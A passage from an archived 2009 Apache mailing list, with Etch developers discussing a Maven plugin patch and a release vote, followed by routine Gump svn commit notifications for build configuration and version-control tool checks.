zTJemLFhJGkeu2b0Gvz0LptmpL9Dr2vc4/IFOo6wz82NotttnclmG1fJNbQNIf7Kviu0 tZiAWYLSZIQldLZzZgbwHRK1c2AopB/mMbqwU= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=message-id:from:to:in-reply-to:content-type :content-transfer-encoding:x-mailer:mime-version:subject:date :references; b=oQFGiTtGj3dCCKcyp0gnil/JtS0gPbuE+3bcOr79sMe2oEAmfkn5r3HwIh0l1539lP fOlAyLJgggbY+wb3DOJPMqBtVLZ8p7RA4PtoVilKOoyEq8bFyC+sMXoe7Kjouqavfnnm HTxsyiOGkIgBD49VV39/cvY+oXMYDsjQnp8Yg= Received: by 161.129.204.104 with SMTP id e13mr2780483and.57.1236478123681; Sat, 07 Mar 2009 18:08:43 -0800 (PST) Received: from ?161.129.204.104? (cpe-70-112-21-95.austin.res.rr.com [161.129.204.104]) by mx.google.com with ESMTPS id b32sm5087215ana.35.2161.129.204.104.08.42 (version=TLSv1/SSLv3 cipher=RC4-MD5); Sat, 07 Mar 2009 18:08:43 -0800 (PST) Message-Id: <[email protected]> From: Rene Barraza <[email protected]> To: "[email protected]" <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=utf-8; format=flowed Content-Transfer-Encoding: quoted-printable X-Mailer: iPhone Mail (5H11) Mime-Version: 1.0 (iPhone Mail 5H11) Subject: Re: etch maven plugin... Date: Sat, 7 Mar 2009 20:08:37 -0600 References: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org The sooner the better, I think. -Ren=C3=A9 On Mar 7, 2009, at 7:49 PM, scott comer <[email protected]> wrote: > anyone have any problem with me rolling this into the 1.1 release? > > thanks, > scott out > From [email protected] Sun Mar 08 02:25:41 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47016 invoked from network); 8 Mar 2009 02:25:41 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2009 02:25:41 -0000 Received: (qmail 7763 invoked by uid 500); 8 Mar 2009 02:25:40 -0000 Delivered-To: [email protected] Received: (qmail 7748 invoked by uid 500); 8 Mar 2009 02:25:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 7737 invoked by uid 99); 8 Mar 2009 02:25:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 18:25:40 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO yx-out-1718.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 08 Mar 2009 02:25:33 +0000 Received: by yx-out-1718.google.com with SMTP id 4so760043yxp.0 for <[email protected]>; Sat, 07 Mar 2009 18:25:11 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type:content-transfer-encoding; bh=uIYf4LkhP2clk0cw/9vXSu063i7Ql7nycOBP8fGdMs0=; b=DbKYfBH6AkK9sNbcvCPsv+sDxgIl5Vbs1o28pt/Cq+Ff8MCrP9FOrVEr/Nz1VhpIV1 GvJX3tyhppfOuplUpY3yORNg1INDH03NYuOu7H9vzacpIm5FE0UWdwX/eXrnw5iFPK3I u6wUpP1AtPhsGAbO3X4JarkifTRwFTfXVmgBk= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type :content-transfer-encoding; b=hTE2gB+QIPzSvr1X3t4Pamvf4jdmSTOG/oV2eFO9wZnhUQ2HQ3XkU2jWTRBn1rExBH jk87ijGQjBJyRg4mkO4YmAwPYndofd6RZ9tnsRWu5BmlBD9MLslOk5Oj8u4PCoR113oR HT16aArM5pw4HcTfbpz3XEv39W0VVDYWozmUI= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id g7mr1284704vcn.5.1236479111584; Sat, 07 Mar 2009 18:25:11 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> Date: Sat, 7 Mar 2009 20:25:11 -0600 X-Google-Sender-Auth: 076e6de0a739b5b9 Message-ID: <[email protected]> Subject: Re: etch maven plugin... From: rick bolkey <[email protected]> To: [email protected] Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable X-Virus-Checked: Checked by ClamAV on apache.org No problem. The plug in uses 1.0.2 in the pom, but should compile without changes with 1.0.1. also, remembered that the jar extraction extracts .txt files instead of .etchinc files. On 3/7/09, Rene Barraza <[email protected]> wrote: > The sooner the better, I think. > > -Ren=E9 > > > On Mar 7, 2009, at 7:49 PM, scott comer <[email protected]> wrote: > >> anyone have any problem with me rolling this into the 1.1 release? >> >> thanks, >> scott out >> > --=20 Sent from my mobile device From [email protected] Sun Mar 08 02:27:12 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 47744 invoked from network); 8 Mar 2009 02:27:12 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2009 02:27:12 -0000 Received: (qmail 8603 invoked by uid 500); 8 Mar 2009 02:27:12 -0000 Delivered-To: [email protected] Received: (qmail 8596 invoked by uid 500); 8 Mar 2009 02:27:12 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 8585 invoked by uid 99); 8 Mar 2009 02:27:12 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 18:27:12 -0800 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO asmtpout022.mac.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 08 Mar 2009 02:27:04 +0000 MIME-version: 1.0 Content-transfer-encoding: 8BIT Content-type: text/plain; charset=ISO-8859-1; format=flowed Received: from [161.129.204.104] (cpe-70-116-77-177.austin.res.rr.com [161.129.204.104]) by asmtp022.mac.com (Sun Java(tm) System Messaging Server 6.3-8.01 (built Dec 16 2008; 32bit)) with ESMTPSA id <[email protected]> for [email protected]; Sat, 07 Mar 2009 18:26:44 -0800 (PST) X-Proofpoint-Virus-Version: vendor=fsecure engine=1.12.7400:2.4.4,1.2.40,4.0.166 definitions=2009-03-07_03:2009-03-05,2009-03-07,2009-03-07 signatures=0 Message-id: <[email protected]> Date: Sat, 07 Mar 2009 20:26:44 -0600 From: scott comer <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20081209) To: [email protected] Subject: Re: etch maven plugin... References: <[email protected]> <[email protected]> <[email protected]> In-reply-to: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org how can we change the jar extraction? scott out rick bolkey wrote: > No problem. The plug in uses 1.0.2 in the pom, but should compile > without changes with 1.0.1. also, remembered that the jar extraction > extracts .txt files instead of .etchinc files. > > On 3/7/09, Rene Barraza <[email protected]> wrote: > >> The sooner the better, I think. >> >> -René >> >> >> On Mar 7, 2009, at 7:49 PM, scott comer <[email protected]> wrote: >> >> >>> anyone have any problem with me rolling this into the 1.1 release? >>> >>> thanks, >>> scott out >>> >>> > > From [email protected] Sun Mar 08 03:20:19 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 56176 invoked from network); 8 Mar 2009 03:20:19 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Mar 2009 03:20:19 -0000 Received: (qmail 25632 invoked by uid 500); 8 Mar 2009 03:20:19 -0000 Delivered-To: [email protected] Received: (qmail 25588 invoked by uid 500); 8 Mar 2009 03:20:19 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 25577 invoked by uid 99); 8 Mar 2009 03:20:19 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sat, 07 Mar 2009 19:20:19 -0800 X-ASF-Spam-Status: No, hits=2.2 required=10.0 tests=HTML_MESSAGE,SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO mail-gx0-f166.google.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Sun, 08 Mar 2009 03:20:12 +0000 Received: by gxk10 with SMTP id 10so1715280gxk.12 for <[email protected]>; Sat, 07 Mar 2009 19:19:52 -0800 (PST) DKIM-Signature: v=1; a=rsa-sha256; c=relaxed/relaxed; d=gmail.com; s=gamma; h=domainkey-signature:mime-version:sender:received:in-reply-to :references:date:x-google-sender-auth:message-id:subject:from:to :content-type; bh=cPrwKAkRT4A1PyLdTWZeg2O+XFtCjhGQkInekBtkmVQ=; b=aAA4OlBetFpvr5VuE/bRQHwDkI94QIgmthZD0tRNrpBspWWpm2rHegbjG3tTF+dmI4 CzU4y8lvi6RxLBh3yMcBsJw/8U65T+JzuEo229CxQiTMNWd5YZmoayiQNe6GKg8YikWA /Jmfcbha9uVyrFvY4Rwp8PRsMBDlCaEhAsIMI= DomainKey-Signature: a=rsa-sha1; c=nofws; d=gmail.com; s=gamma; h=mime-version:sender:in-reply-to:references:date :x-google-sender-auth:message-id:subject:from:to:content-type; b=fV2VL7XVYVub64nVw2muP2/t5n/HsLyPHSiIFaEu+qQBBFcsGw6VmIIvrufIXpXlwD o49Gp0beePQq4RI1XuM+GNv6MzZsGs+Jog14M1KXTAHaEIm6TjbzwXS422WwI5OvyYPv gBnk+Nsa6LGqK1/W7MZ9L5TD40cHChk2GZsWU= MIME-Version: 1.0 Sender: [email protected] Received: by 161.129.204.104 with SMTP id r5mr1281560vcn.69.1236482391813; Sat, 07 Mar 2009 19:19:51 -0800 (PST) In-Reply-To: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> Date: Sat, 7 Mar 2009 21:19:51 -0600 X-Google-Sender-Auth: 6ce4adc76eaa10c8 Message-ID: <[email protected]> Subject: Re: etch maven plugin... From: rick bolkey <[email protected]> To: [email protected] Content-Type: multipart/mixed; boundary=0016e6470b68bc2fcf046492fdc1 X-Virus-Checked: Checked by ClamAV on apache.org --0016e6470b68bc2fcf046492fdc1 Content-Type: multipart/alternative; boundary=0016e6470b68bc2fc8046492fdbf --0016e6470b68bc2fc8046492fdbf Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable here's the patch On Sat, Mar 7, 2009 at 8:26 PM, scott comer <[email protected]> wrote: > how can we change the jar extraction? > > scott out > > > rick bolkey wrote: > >> No problem. The plug in uses 1.0.2 in the pom, but should compile >> without changes with 1.0.1. also, remembered that the jar extraction >> extracts .txt files instead of .etchinc files. >> >> On 3/7/09, Rene Barraza <[email protected]> wrote: >> >> >>> The sooner the better, I think. >>> >>> -Ren=E9 >>> >>> >>> On Mar 7, 2009, at 7:49 PM, scott comer <[email protected]> wrote: >>> >>> >>> >>>> anyone have any problem with me rolling this into the 1.1 release? >>>> >>>> thanks, >>>> scott out >>>> >>>> >>>> >>> >> >> > > --0016e6470b68bc2fc8046492fdbf Content-Type: text/html; charset=ISO-8859-1 Content-Transfer-Encoding: quoted-printable here&#39;s the patch<br><br><div class=3D"gmail_quote">On Sat, Mar 7, 2009 = at 8:26 PM, scott comer <span dir=3D"ltr">&lt;<a href=3D"mailto:[email protected].= com">[email protected]</a>&gt;</span> wrote:<br><blockquote class=3D"gmail_quo= te" style=3D"border-left: 1px solid rgb(204, 204, 204); margin: 0pt 0pt 0pt= 0.8ex; padding-left: 1ex;"> how can we change the jar extraction?<br> <br> scott out<div><div></div><div class=3D"h5"><br> <br> rick bolkey wrote:<br> <blockquote class=3D"gmail_quote" style=3D"border-left: 1px solid rgb(204, = 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> No problem. The plug in uses 1.0.2 in the pom, but should compile<br> without changes with 1.0.1. =A0also, remembered that the jar extraction<br> extracts .txt files instead of .etchinc files.<br> <br> On 3/7/09, Rene Barraza &lt;<a href=3D"mailto:[email protected]" target= =3D"_blank">[email protected]</a>&gt; wrote:<br> =A0<br> <blockquote class=3D"gmail_quote" style=3D"border-left: 1px solid rgb(204, = 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> The sooner the better, I think.<br> <br> -Ren=E9<br> <br> <br> On Mar 7, 2009, at 7:49 PM, scott comer &lt;<a href=3D"mailto:[email protected]= m" target=3D"_blank">[email protected]</a>&gt; wrote:<br> <br> =A0 =A0<br> <blockquote class=3D"gmail_quote" style=3D"border-left: 1px solid rgb(204, = 204, 204); margin: 0pt 0pt 0pt 0.8ex; padding-left: 1ex;"> anyone have any problem with me rolling this into the 1.1 release?<br> <br> thanks,<br> scott out<br> <br> =A0 =A0 =A0<br> </blockquote></blockquote> <br> =A0<br> </blockquote> <br> </div></div></blockquote></div><br> --0016e6470b68bc2fc8046492fdbf-- --0016e6470b68bc2fcf046492fdc1 Content-Type: text/x-patch; charset=US-ASCII; name="Changing_to__etchinc_.patch" Content-Disposition: attachment; filename="Changing_to__etchinc_.patch" Content-Transfer-Encoding: base64 X-Attachment-Id: f_fs15otzh0 SW5kZXg6IHNyYy9tYWluL2phdmEvb3JnL2FwYWNoZS9ldGNoL21vam8vZXRjaC9FdGNoU2Nhbk1v am8uamF2YQo9PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09Ci0tLSBzcmMvbWFpbi9qYXZhL29yZy9hcGFjaGUvZXRjaC9tb2pv L2V0Y2gvRXRjaFNjYW5Nb2pvLmphdmEJKHJldmlzaW9uIDgpCisrKyBzcmMvbWFpbi9qYXZhL29y Zy9hcGFjaGUvZXRjaC9tb2pvL2V0Y2gvRXRjaFNjYW5Nb2pvLmphdmEJU2F0IE1hciAwNyAyMTox NToyNiBDU1QgMjAwOQpAQCAtMTc4LDcgKzE3OCw3IEBACiAgICAgICAgICAgICAgICAgaWYgKCBl eHRyYWN0RmlsZXMoIGdldExvZygpLCBhcnRpZmFjdEZpbGUsIGdldFNhbmRib3hEaXJlY3Rvcnko KSwgIi4qXFwuZXRjaCIgKSApCiAgICAgICAgICAgICAgICAgewogICAgICAgICAgICAgICAgICAg ICAvLyBleHRyYWN0IGFueSB0eHQgaW5jbHVkZXMgaWYgd2UgZmluZCBhbiBldGNoIGZpbGUuCi0g ICAgICAgICAgICAgICAgICAgIGV4dHJhY3RGaWxlcyggZ2V0TG9nKCksIGFydGlmYWN0RmlsZSwg Z2V0U2FuZGJveERpcmVjdG9yeSgpLCAiLipcXC50eHQiICk7CisgICAgICAgICAgICAgICAgICAg IGV4dHJhY3RGaWxlcyggZ2V0TG9nKCksIGFydGlmYWN0RmlsZSwgZ2V0U2FuZGJveERpcmVjdG9y eSgpLCAiLipcXC5ldGNoaW5jIiApOwogICAgICAgICAgICAgICAgIH0KICAgICAgICAgICAgIH0K ICAgICAgICAgICAgIGNhdGNoIChJT0V4Y2VwdGlvbiBlKQo= --0016e6470b68bc2fcf046492fdc1-- From [email protected] Mon Mar 30 12:38:40 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 30248 invoked from network); 30 Mar 2009 12:38:40 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 30 Mar 2009 12:38:40 -0000 Received: (qmail 54500 invoked by uid 500); 30 Mar 2009 12:38:40 -0000 Delivered-To: [email protected] Received: (qmail 54461 invoked by uid 500); 30 Mar 2009 12:38:40 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <etch-dev.incubator.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 54451 invoked by uid 99); 30 Mar 2009 12:38:40 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 30 Mar 2009 12:38:40 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (nike.apache.org: domain of [email protected] designates 161.129.204.104 as permitted sender) Received: from [161.129.204.104] (HELO asmtpout012.mac.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 30 Mar 2009 12:38:31 +0000 MIME-version: 1.0 Content-transfer-encoding: 7BIT Content-type: text/plain; charset=ISO-8859-1; format=flowed Received: from [161.129.204.104] (cpe-70-116-77-177.austin.res.rr.com [161.129.204.104]) by asmtp012.mac.com (Sun Java(tm) System Messaging Server 6.3-8.01 (built Dec 16 2008; 32bit)) with ESMTPSA id <[email protected]> for [email protected]; Mon, 30 Mar 2009 05:38:10 -0700 (PDT) Message-id: <[email protected]> Date: Mon, 30 Mar 2009 07:38:08 -0500 From: scott comer <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20090302) To: [email protected] Subject: vote for release 1.0.2 X-Virus-Checked: Checked by ClamAV on apache.org so we had three +1 votes. james wasn't sure the three were binding. can we please resolve this issue and move on? scott out
From [email protected] Wed Feb 04 09:36:52 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6780 invoked from network); 4 Feb 2009 09:36:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Feb 2009 09:36:52 -0000 Received: (qmail 22105 invoked by uid 500); 4 Feb 2009 09:36:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 22096 invoked by uid 99); 4 Feb 2009 09:36:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Feb 2009 01:36:52 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Wed, 04 Feb 2009 09:36:50 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 9DA4B2388896; Wed, 4 Feb 2009 09:36:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r740668 - /gump/metadata/project/xml-fop.xml Date: Wed, 04 Feb 2009 09:36:29 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: jeremias Date: Wed Feb 4 09:36:28 2009 New Revision: 740668 URL: http://svn.apache.org/viewvc?rev=740668&view=rev Log: Changing Ant target to run part of the test suite to begin with. Not running the full layout engine tests, yet. Modified: gump/metadata/project/xml-fop.xml Modified: gump/metadata/project/xml-fop.xml URL: http://svn.apache.org/viewvc/gump/metadata/project/xml-fop.xml?rev=740668&r1=740667&r2=740668&view=diff ============================================================================== --- gump/metadata/project/xml-fop.xml (original) +++ gump/metadata/project/xml-fop.xml Wed Feb 4 09:36:28 2009 @@ -31,7 +31,7 @@ <mkdir dir="build/classes"/> <mkdir dir="build/codegen-classes"/> - <ant target="package"/> + <ant target="gump"/> <depend project="xml-apis"/> <depend project="xml-xerces"/> <depend project="xalan"/> From [email protected] Fri Feb 06 03:55:59 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 89838 invoked from network); 6 Feb 2009 03:55:57 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 03:55:57 -0000 Received: (qmail 12498 invoked by uid 500); 6 Feb 2009 03:55:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 12489 invoked by uid 99); 6 Feb 2009 03:55:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 19:55:57 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 03:55:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 42CD123888A0; Fri, 6 Feb 2009 03:55:36 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741390 - /gump/trunk/cron/gump.py Date: Fri, 06 Feb 2009 03:55:36 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 03:55:35 2009 New Revision: 741390 URL: http://svn.apache.org/viewvc?rev=741390&view=rev Log: all of gump uses svn by now Modified: gump/trunk/cron/gump.py (contents, props changed) Modified: gump/trunk/cron/gump.py URL: http://svn.apache.org/viewvc/gump/trunk/cron/gump.py?rev=741390&r1=741389&r2=741390&view=diff ============================================================================== Binary files - no diff available. Propchange: gump/trunk/cron/gump.py ------------------------------------------------------------------------------ svn:eol-style = native Propchange: gump/trunk/cron/gump.py ('svn:mime-type' removed) From [email protected] Fri Feb 06 04:32:32 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 95618 invoked from network); 6 Feb 2009 04:32:32 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 04:32:32 -0000 Received: (qmail 26667 invoked by uid 500); 6 Feb 2009 04:32:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 26658 invoked by uid 99); 6 Feb 2009 04:32:32 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 20:32:32 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 04:32:31 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id 8EFE923889F3; Fri, 6 Feb 2009 04:32:11 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741400 - /gump/metadata/testbase/profile.xml Date: Fri, 06 Feb 2009 04:32:11 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 04:32:11 2009 New Revision: 741400 URL: http://svn.apache.org/viewvc?rev=741400&view=rev Log: adapt testbed to gsbase repository change Modified: gump/metadata/testbase/profile.xml Modified: gump/metadata/testbase/profile.xml URL: http://svn.apache.org/viewvc/gump/metadata/testbase/profile.xml?rev=741400&r1=741399&r2=741400&view=diff ============================================================================== --- gump/metadata/testbase/profile.xml (original) +++ gump/metadata/testbase/profile.xml Fri Feb 6 04:32:11 2009 @@ -38,9 +38,10 @@ <repository href="repository/jakarta-svn.xml"/> <repository href="repository/junit.xml"/> <repository href="repository/logging.xml"/> + <repository href="repository/sourceforge.xml"/> <repository href="repository/xerces.xml"/> <repository href="repository/xml-svn.xml"/> <project name="jaxp" package="jaxp-1_3"/> <project name="junitperf" package="junitperf-1.8"/> -</profile> \ No newline at end of file +</profile> From [email protected] Fri Feb 06 04:43:53 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 96615 invoked from network); 6 Feb 2009 04:43:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 04:43:53 -0000 Received: (qmail 27437 invoked by uid 500); 6 Feb 2009 04:43:52 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 27427 invoked by uid 99); 6 Feb 2009 04:43:52 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 20:43:52 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 04:43:51 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id E25FB23888A0; Fri, 6 Feb 2009 04:43:29 +0000 (UTC) Content-Type: text/plain; charset="utf-8" MIME-Version: 1.0 Content-Transfer-Encoding: 7bit Subject: svn commit: r741403 - /gump/trunk/python/gump/core/run/gumpenv.py Date: Fri, 06 Feb 2009 04:43:28 -0000 To: [email protected] From: [email protected] X-Mailer: svnmailer-1.0.8 Message-Id: <[email protected]> X-Virus-Checked: Checked by ClamAV on apache.org Author: bodewig Date: Fri Feb 6 04:43:28 2009 New Revision: 741403 URL: http://svn.apache.org/viewvc?rev=741403&view=rev Log: implement the trivial part of supporting a new command - check for it's existance Modified: gump/trunk/python/gump/core/run/gumpenv.py Modified: gump/trunk/python/gump/core/run/gumpenv.py URL: http://svn.apache.org/viewvc/gump/trunk/python/gump/core/run/gumpenv.py?rev=741403&r1=741402&r2=741403&view=diff ============================================================================== --- gump/trunk/python/gump/core/run/gumpenv.py (original) +++ gump/trunk/python/gump/core/run/gumpenv.py Fri Feb 6 04:43:28 2009 @@ -82,6 +82,10 @@ self.noJavac = False self.noMake = False self.noMvnRepoProxy = False + self.noGit = False + self.noDarcs = False + self.noHg = False + self.noBzr = False self.javaProperties = None @@ -194,6 +198,22 @@ self.noMake=True self.addWarning('"make" command not found, no make builds') + if not self.noGit and not self._checkExecutable('git','--version',False): + self.noGit=True + self.addWarning('"git" command not found, no GIT repository updates') + + if not self.noDarcs and not self._checkExecutable('darcs','--version',False): + self.noDarcs=True + self.addWarning('"darcs" command not found, no DARCS repository updates') + + if not self.noHg and not self._checkExecutable('hg','--version',False): + self.noHg=True + self.addWarning('"hg" command not found, no Mercurial repository updates') + + if not self.noBzr and not self._checkExecutable('bzr','--version',False): + self.noBzr=True + self.addWarning('"bzr" command not found, no Bazar repository updates') + self.checked = True self.changeState(STATE_SUCCESS) From [email protected] Fri Feb 06 05:22:06 2009 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 2893 invoked from network); 6 Feb 2009 05:22:06 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 6 Feb 2009 05:22:06 -0000 Received: (qmail 49892 invoked by uid 500); 6 Feb 2009 05:22:06 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk List-Help: <mailto:[email protected]> List-Unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> List-Id: <commits.gump.apache.org> Reply-To: [email protected] Delivered-To: mailing list [email protected] Received: (qmail 49883 invoked by uid 99); 6 Feb 2009 05:22:06 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 05 Feb 2009 21:22:06 -0800 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO eris.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 06 Feb 2009 05:21:56 +0000 Received: by eris.apache.org (Postfix, from userid 65534) id B04DB23888A0; Fri, 6 Feb 2009 05:21:35 +0000 (UTC) Content-Type: text/plain; charset="utf-8" 